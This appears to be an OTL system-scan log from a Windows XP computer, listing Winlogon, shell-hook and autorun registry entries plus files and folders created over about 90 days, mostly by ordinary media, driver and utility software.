O20 - Winlogon\Notify\AtiExtEvent: DllName - Ati2evxx.dll - C:\WINDOWS\System32\ati2evxx.dll (ATI Technologies Inc.)
O20 - Winlogon\Notify\LBTWlgn: DllName - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll - c:\Program Files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll (Logitech, Inc.)
O22 - SharedTaskScheduler: {1984DD45-52CF-49cd-AB77-18F378FEA264} - FencesShellExt - C:\Program Files\Stardock\Fences\FencesMenu.dll (Stardock)
O24 - Desktop WallPaper: C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2010/02/12 22:03:36 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk /r \??\L:) -  File not found
O34 - HKLM BootExecute: (autocheck autochk *) -  File not found
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*

NetSvcs: 6to4 -  File not found
NetSvcs: Ias - C:\WINDOWS\system32\ias [2010/02/12 16:38:57 | 000,000,000 | ---D | M]
NetSvcs: Iprip -  File not found
NetSvcs: Irmon -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: WmdmPmSp -  File not found

CREATERESTOREPOINT
Restore point Set: OTL Restore Point (0)

[color=#E56717]========== Files/Folders - Created Within 90 Days ==========[/color]

[2010/05/13 20:31:28 | 000,570,880 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
[2010/05/12 12:40:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\PrimoPDF
[2010/05/12 12:39:58 | 000,000,000 | ---D | C] -- C:\Program Files\Nitro PDF
[2010/05/12 10:47:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\HumbleIndieBundleGames
[2010/05/11 19:16:34 | 000,000,000 | -HSD | C] -- C:\RECYCLER
[2010/05/11 19:11:24 | 000,000,000 | ---D | C] -- C:\Program Files\Emsisoft Anti-Malware
[2010/05/11 19:11:24 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Anti-Malware
[2010/05/11 18:36:57 | 000,000,000 | RHSD | C] -- C:\cmdcons
[2010/05/11 18:35:18 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2010/05/11 18:35:18 | 000,161,792 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2010/05/11 18:35:18 | 000,136,704 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2010/05/11 18:35:18 | 000,031,232 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2010/05/11 18:34:54 | 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2010/05/11 17:04:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\LogMeIn Hamachi
[2010/05/11 17:04:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\LogMeIn Hamachi
[2010/05/11 17:04:00 | 000,000,000 | ---D | C] -- C:\Program Files\LogMeIn Hamachi
[2010/05/11 15:03:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\drivers
[2010/05/11 14:54:31 | 000,023,456 | ---- | C] (Phoenix Technologies) -- C:\WINDOWS\System32\drivers\DrvAgent32.sys
[2010/05/11 14:54:31 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\eSupport.com
[2010/05/10 07:05:06 | 000,000,000 | ---D | C] -- C:\Program Files\Partition Wizard Home Edition 5.0
[2010/05/09 17:15:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My Received Files
[2010/05/08 19:10:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Wii-downloads
[2010/05/08 18:29:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Dragon-PDFs
[2010/05/08 18:06:02 | 000,000,000 | ---D | C] -- C:\Program Files\Marvell
[2010/05/06 20:43:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Stardock
[2010/05/06 20:43:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Stardock
[2010/05/06 20:37:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Stardock
[2010/05/06 20:37:06 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{A87EB928-0C6C-4071-AEF1-59E32BAEDF1B}
[2010/05/06 20:36:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\PackageAware
[2010/05/06 20:36:27 | 000,000,000 | ---D | C] -- C:\Program Files\Stardock
[2010/05/06 20:36:27 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Stardock
[2010/05/06 20:36:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\DonationCoder
[2010/05/06 20:35:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\DonationCoder
[2010/05/06 20:35:53 | 000,000,000 | ---D | C] -- C:\Program Files\FindAndRunRobot
[2010/05/01 22:26:42 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Me\Recent
[2010/04/28 18:32:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Sparkplay Media
[2010/04/26 19:34:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\NtmsData
[2010/04/25 22:36:28 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Games for Windows - LIVE
[2010/04/25 22:19:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Flight Simulator X Files
[2010/04/25 21:30:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\InstallShield Installation Information
[2010/04/25 21:30:27 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Fallout3
[2010/04/25 21:28:29 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\xlive
[2010/04/25 14:38:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My eBooks
[2010/04/25 14:38:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Mobipocket
[2010/04/25 14:38:34 | 000,000,000 | ---D | C] -- C:\Program Files\Mobipocket.com
[2010/04/25 11:50:13 | 000,230,824 | R--- | C] (Coupons, Inc.) -- C:\WINDOWS\System32\cpnprt2.cid
[2010/04/25 11:50:08 | 000,000,000 | ---D | C] -- C:\Program Files\Coupons
[2010/04/25 11:50:08 | 000,000,000 | ---D | C] -- C:\WINDOWS\Cache
[2010/04/24 17:11:40 | 000,000,000 | ---D | C] -- C:\Perl
[2010/04/24 14:24:38 | 000,000,000 | ---D | C] -- C:\Program Files\Belarc
[2010/04/24 14:13:36 | 000,000,000 | ---D | C] -- C:\Program Files\PhotoScape
[2010/04/21 22:00:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\breakin
[2010/04/21 21:45:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2010/04/21 21:44:54 | 000,000,000 | ---D | C] -- C:\Program Files\Syslogd
[2010/04/21 21:16:04 | 000,000,000 | ---D | C] -- C:\Program Files\WinPcap
[2010/04/21 21:03:19 | 000,000,000 | ---D | C] -- C:\Snort
[2010/04/20 20:18:40 | 000,413,696 | ---- | C] (Creative Labs) -- C:\WINDOWS\System32\wrap_oal.dll
[2010/04/20 20:18:40 | 000,110,592 | ---- | C] (Portions (C) Creative Labs Inc. and NVIDIA Corp.) -- C:\WINDOWS\System32\OpenAL32.dll
[2010/04/20 20:18:40 | 000,000,000 | ---D | C] -- C:\Program Files\OpenAL
[2010/04/20 20:18:31 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\flightgear.org
[2010/04/19 22:27:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\YSFLIGHT.COM
[2010/04/19 22:27:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\YSFLIGHT.COM
[2010/04/18 20:35:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Sophies_Photos
[2010/04/17 21:40:50 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\a-squared
[2010/04/17 21:37:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\GetRightToGo
[2010/04/16 08:02:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\TeamViewer
[2010/04/16 08:02:02 | 000,000,000 | ---D | C] -- C:\Program Files\TeamViewer
[2010/04/15 22:24:47 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\IObit
[2010/04/12 00:37:21 | 000,045,056 | ---- | C] (Adaptec) -- C:\WINDOWS\System32\wnaspi32.dll
[2010/04/12 00:20:12 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Pinnacle
[2010/04/12 00:20:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Downloaded Installations
[2010/04/12 00:19:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Pinnacle
[2010/04/12 00:19:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Pinnacle Studio Ultimate
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\PACE Anti-Piracy
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\PACE Anti-Piracy
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\PACE Anti-Piracy
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\PACE Anti-Piracy
[2010/04/12 00:18:45 | 000,017,408 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\drivers\dgfwboot.sys
[2010/04/12 00:18:45 | 000,011,776 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\drivers\diginet.sys
[2010/04/12 00:18:43 | 003,638,655 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\DirectIO.dll
[2010/04/12 00:18:43 | 000,483,328 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\Dsi.dll
[2010/04/12 00:18:43 | 000,118,784 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\Diomidi.DLL
[2010/04/12 00:18:43 | 000,015,872 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\digicoin.dll
[2010/04/12 00:18:42 | 000,000,000 | ---D | C] -- C:\Program Files\Digidesign
[2010/04/12 00:14:27 | 000,000,000 | ---D | C] -- C:\Program Files\Avid
[2010/04/12 00:13:50 | 000,000,000 | ---D | C] -- C:\Program Files\SafeNet Sentinel
[2010/04/12 00:13:50 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\SafeNet Sentinel
[2010/04/12 00:13:49 | 000,000,000 | ---D | C] -- C:\WINDOWS\Downloaded Installations
[2010/04/11 22:34:15 | 000,000,000 | ---D | C] -- C:\Config.Msi
[2010/04/11 22:33:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Pinnacle
[2010/04/11 22:23:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Studio14Trial
[2010/04/11 21:17:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\AVS4YOU
[2010/04/11 21:17:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\AVS4YOU
[2010/04/11 21:16:37 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\AVSMedia
[2010/04/11 21:16:34 | 000,000,000 | ---D | C] -- C:\Program Files\AVS4YOU
[2010/04/11 21:07:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Pinnacle Studio
[2010/04/11 21:05:07 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\Shared Avid Projects
[2010/04/11 21:04:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Avid
[2010/04/11 21:04:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Avid
[2010/04/11 20:51:11 | 000,000,000 | ---D | C] -- C:\Program Files\InterLok
[2010/04/11 12:56:01 | 000,000,000 | ---D | C] -- C:\Program Files\Pure Motion
[2010/04/11 12:56:00 | 000,000,000 | ---D | C] -- C:\Program Files\Sonic Foundry
[2010/04/11 12:56:00 | 000,000,000 | ---D | C] -- C:\Program Files\Adobe
[2010/04/11 12:55:54 | 000,000,000 | ---D | C] -- C:\Program Files\DebugMode
[2010/04/10 21:18:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Temp
[2010/04/10 21:18:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Google
[2010/04/08 17:54:07 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\MAGIX
[2010/04/08 17:52:48 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\MAGIX_Speed2_burnR_mxcdr
[2010/04/08 17:52:40 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\MAGIX Shared
[2010/04/08 17:52:39 | 000,917,504 | ---- | C] (MAGIX AG) -- C:\WINDOWS\System32\MXRestore.exe
[2010/04/08 17:52:39 | 000,724,992 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLAV32.dll
[2010/04/08 17:52:39 | 000,278,528 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLRES32.dll
[2010/04/08 17:52:39 | 000,221,184 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLDRV32.dll
[2010/04/08 17:52:39 | 000,212,992 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLDEV32.dll
[2010/04/08 17:52:39 | 000,147,456 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLCPY32.dll
[2010/04/08 17:52:39 | 000,114,688 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLCDA32.dll
[2010/04/08 17:52:39 | 000,094,208 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLIO32.dll
[2010/04/08 17:52:39 | 000,090,112 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPRF32.dll
[2010/04/08 17:52:39 | 000,077,824 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPNT32.dll
[2010/04/08 17:52:39 | 000,065,536 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\STRING32.dll
[2010/04/08 17:52:39 | 000,065,536 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPTL32.dll
[2010/04/08 17:52:39 | 000,061,440 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLCDF32.dll
[2010/04/08 17:52:39 | 000,057,344 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLTPO32.dll
[2010/04/08 17:52:39 | 000,053,248 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPRJ32.dll
[2010/04/08 17:52:39 | 000,045,056 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLIMG32.dll
[2010/04/08 17:52:39 | 000,040,960 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLRD32.dll
[2010/04/08 17:52:39 | 000,032,768 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLMSC32.dll
[2010/04/08 17:52:39 | 000,032,768 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLISO32.dll
[2010/04/08 17:52:39 | 000,032,768 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLDIR32.dll
[2010/04/08 17:52:39 | 000,024,576 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\TTIC32.dll
[2010/04/08 17:52:39 | 000,024,576 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\TTI32.dll
[2010/04/08 17:52:39 | 000,024,576 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLIX.dll
[2010/04/08 17:52:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\MAGIX_Movie_Edit_Pro_15_silver
[2010/04/08 17:52:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\MAGIX
[2010/04/08 17:51:49 | 000,000,000 | ---D | C] -- C:\Program Files\MAGIX
[2010/04/08 17:51:18 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\MAGIX Services
[2010/04/07 20:38:38 | 000,000,000 | ---D | C] -- C:\Program Files\IObit
[2010/04/07 20:38:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\IObit
[2010/04/07 19:48:43 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Silverlight
[2010/04/05 18:14:55 | 000,000,000 | ---D | C] -- C:\WINDOWS\.jagex_cache_32
[2010/04/03 09:18:36 | 000,000,000 | ---D | C] -- C:\Program Files\DAEMON Tools Lite
[2010/04/01 09:34:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Foxit Software
[2010/03/29 19:56:57 | 000,000,000 | ---D | C] -- C:\Program Files\Notepad++
[2010/03/29 19:56:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Notepad++
[2010/03/27 17:22:13 | 000,000,000 | ---D | C] -- C:\Program Files\Padus
[2010/03/26 21:43:53 | 000,061,440 | ---- | C] (Khronos Group) -- C:\WINDOWS\System32\OpenCL.dll
[2010/03/25 21:15:44 | 000,000,000 | ---D | C] -- C:\Program Files\Paint.NET
[2010/03/25 21:15:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Paint.NET
[2010/03/19 19:32:02 | 000,019,024 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2010/03/19 19:32:01 | 000,164,048 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2010/03/19 19:32:01 | 000,023,376 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2010/03/19 19:32:00 | 000,100,432 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2010/03/19 19:32:00 | 000,094,800 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2010/03/19 19:32:00 | 000,046,672 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2010/03/19 19:31:59 | 000,028,880 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2010/03/19 19:31:46 | 000,165,032 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2010/03/19 19:31:46 | 000,038,848 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\avastSS.scr
[2010/03/15 19:55:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Sansa Media Converter
[2010/03/15 19:55:03 | 000,014,608 | ---- | C] (InterVideo, Inc.) -- C:\WINDOWS\System32\iviaspi.sys
[2010/03/15 19:54:58 | 000,000,000 | ---D | C] -- C:\Program Files\SanDisk
[2010/03/15 19:44:59 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\SanDisk
[2010/03/14 10:52:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\dwhelper
[2010/03/13 21:35:36 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Pier-Luc_Duchaine
[2010/03/13 21:29:35 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\WinRAR
[2010/03/13 16:33:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\ATI
[2010/03/13 16:33:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\ATI
[2010/03/13 16:11:29 | 000,208,896 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\atipdlxx.dll
[2010/03/13 16:11:29 | 000,155,648 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\Oemdspif.dll
[2010/03/13 16:11:29 | 000,026,112 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\Ati2mdxx.exe
[2010/03/13 16:11:29 | 000,024,064 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\ativcoxx.dll
[2010/03/13 16:11:28 | 000,043,520 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\ati2edxx.dll
[2010/03/10 13:16:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Sun
[2010/03/10 13:16:05 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Java
[2010/03/10 12:41:31 | 000,000,000 | ---D | C] -- C:\Program Files\Java
[2010/03/10 12:40:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Sun
[2010/03/10 11:26:33 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2010/03/10 10:10:03 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Installer Clean Up
[2010/03/10 10:09:55 | 000,000,000 | ---D | C] -- C:\Program Files\MSECACHE
[2010/03/10 00:35:44 | 000,000,000 | ---D | C] -- C:\Program Files\D-Box
[2010/03/09 20:42:32 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Nikon
[2010/03/09 20:41:26 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Digital Image 2006
[2010/03/08 22:34:19 | 000,000,000 | ---D | C] -- C:\Program Files\kidthing
[2010/03/07 21:18:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\JodysStuff
[2010/03/06 19:39:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Foxit
[2010/03/06 19:39:03 | 000,000,000 | ---D | C] -- C:\Program Files\Foxit Software
[2010/03/03 23:21:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\HandBrake
[2010/03/03 23:21:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\HandBrake
[2010/03/03 23:21:12 | 000,000,000 | ---D | C] -- C:\Program Files\Handbrake
[2010/03/02 20:27:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Pictures from Memory Cards
[2010/03/02 18:36:47 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My Games
[2010/02/28 17:54:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Apple Computer
[2010/02/28 15:47:59 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Unity
[2010/02/28 14:40:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Unity
[2010/02/27 16:34:48 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Synchronization Services
[2010/02/27 16:34:40 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2010/02/27 16:34:12 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft.NET
[2010/02/27 16:34:12 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Microsoft
[2010/02/27 16:33:22 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Visual Studio 8
[2010/02/27 16:32:17 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Analysis Services
[2010/02/27 16:32:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SHELLNEW
[2010/02/27 16:31:17 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Office
[2010/02/26 17:20:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Download Manager
[2010/02/26 16:29:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Virtualized Applications
[2010/02/25 23:57:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\GrabIt
[2010/02/24 22:52:36 | 000,000,000 | ---D | C] -- C:\Program Files\ICW
[2010/02/23 00:50:35 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{D69A48BF-7653-4AA8-94BC-5847522A4573}
[2010/02/23 00:49:57 | 000,000,000 | ---D | C] -- C:\Program Files\Vstplugins
[2010/02/23 00:49:57 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Digidesign
[2010/02/23 00:49:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Native Instruments
[2010/02/23 00:49:48 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{0CC51CB2-911C-40BB-BC1B-BD3CAC590222}
[2010/02/23 00:49:31 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{4F32CAF7-963B-404D-BF13-C48BA3F5F6A7}
[2010/02/23 00:49:17 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{AC46DC4F-66BD-4733-A8B4-0B69418C12D0}
[2010/02/23 00:48:52 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{EC98E512-708C-4C3B-9F07-B58768C1DD8A}
[2010/02/23 00:36:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\TruePianos Settings
[2010/02/23 00:36:23 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Native Instruments
[2010/02/23 00:36:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Cakewalk
[2010/02/23 00:33:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Cakewalk
[2010/02/23 00:33:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Cakewalk
[2010/02/23 00:31:04 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{902029B2-957E-4066-85FA-30DA31731718}
[2010/02/23 00:31:00 | 000,000,000 | ---D | C] -- C:\Program Files\Native Instruments
[2010/02/23 00:31:00 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Native Instruments
[2010/02/23 00:29:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Identities
[2010/02/23 00:24:58 | 000,368,640 | ---- | C] (Propellerhead Software AB) -- C:\WINDOWS\System32\ReWire.dll
[2010/02/23 00:24:41 | 000,000,000 | ---D | C] -- C:\Cakewalk Projects
[2010/02/23 00:24:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Cakewalk
[2010/02/23 00:21:31 | 000,000,000 | ---D | C] -- C:\Program Files\Cakewalk
[2010/02/23 00:07:59 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Apple Computer
[2010/02/23 00:07:55 | 000,000,000 | ---D | C] -- C:\Program Files\QT Lite
[2010/02/22 23:57:30 | 000,000,000 | ---D | C] -- C:\WINDOWS\RegisteredPackages
[2010/02/22 20:03:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Windows Search
[2010/02/21 23:27:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\gtk-2.0
[2010/02/21 21:34:08 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\vlc
[2010/02/21 21:33:29 | 000,000,000 | ---D | C] -- C:\Program Files\VideoLAN
[2010/02/21 20:22:21 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\QuickPar
[2010/02/21 20:21:42 | 000,000,000 | ---D | C] -- C:\Program Files\QuickPar
[2010/02/21 19:48:33 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Logitech
[2010/02/21 19:38:07 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Leadertech
[2010/02/21 19:38:00 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\LogiShrd
[2010/02/21 19:37:41 | 000,010,384 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\drivers\LBeepKE.sys
[2010/02/21 19:35:50 | 000,170,512 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\kemutb.dll
[2010/02/21 19:35:50 | 000,145,936 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\KemUtil.dll
[2010/02/21 19:35:50 | 000,117,264 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\KemWnd.dll
